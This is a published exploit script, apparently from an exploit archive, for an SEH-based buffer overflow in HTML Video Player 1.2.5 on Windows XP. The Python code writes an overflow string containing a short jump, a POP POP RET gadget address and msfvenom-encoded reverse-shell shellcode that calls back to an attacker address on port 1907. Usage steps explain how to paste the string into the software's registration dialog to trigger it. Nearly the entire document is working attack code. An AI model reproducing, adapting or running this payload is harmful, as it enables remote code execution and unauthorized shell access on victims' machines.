HTML Video Player 1.2.5 Buffer Overflow

`# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)  
# Author: Kagan Capar  
# Discovery Date: 2018-11-16  
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe  
# Vendor Homepage : http://www.html5videoplayer.net  
# Tested Version: 1.2.5  
# Tested on OS: Windows XP SP3 *ENG  
# Steps to Reproduce: Run the python exploit script, it will create a new  
# file with the name "exploit.txt" and copy content to clipboard   
# Open software, click Help > Register and paste "Username" click "OK"  
# Finally, Connect victim machine on port your localport "1907"  
  
#!/usr/bin/python  
import struct  
  
#SEH chain of main thread, item 0  
#Address=0012EAF4  
#SE handler=41414141  
#=> next_handler below!  
#SEH chain of main thread, item 0  
#Address=0012EAF4  
#SE handler=336F4332 =>   
  
#7C901931 5E POP ESI  
#7C901932 5B POP EBX  
#7C901933 C3 RETN  
  
#Executable modules, item 14  
#Base=7C900000  
#Size=000B2000 (729088.)  
#Entry=7C912AFC ntdll.<ModuleEntryPoint>  
#Name=ntdll (system)  
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101  
#Path=C:\WINDOWS\system32\ntdll.dll  
  
file = open("exploit.txt", "w")  
buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124  
buf+= "\xEB\x06\x90\x90" #6b jmp code  
buf+= struct.pack('<I', 0x7C901931)  
  
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"  
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai  
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)  
#x86/shikata_ga_nai chosen with final size 351  
#Payload size: 351 bytes  
#Final size of py file: 1684 bytes  
  
buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"  
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"  
buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"  
buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"  
buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"  
buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"  
buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"  
buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"  
buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"  
buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"  
buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"  
buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"  
buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"  
buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"  
buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"  
buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"  
buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"  
buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"  
buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"  
buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"  
buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"  
buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"  
buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"  
buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"  
buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"  
buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"  
buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"  
buf += "\x90" * (4000 - len(buf))  
  
print len(buf)  
file.write(buf)  
file.close()  
  
  
  
`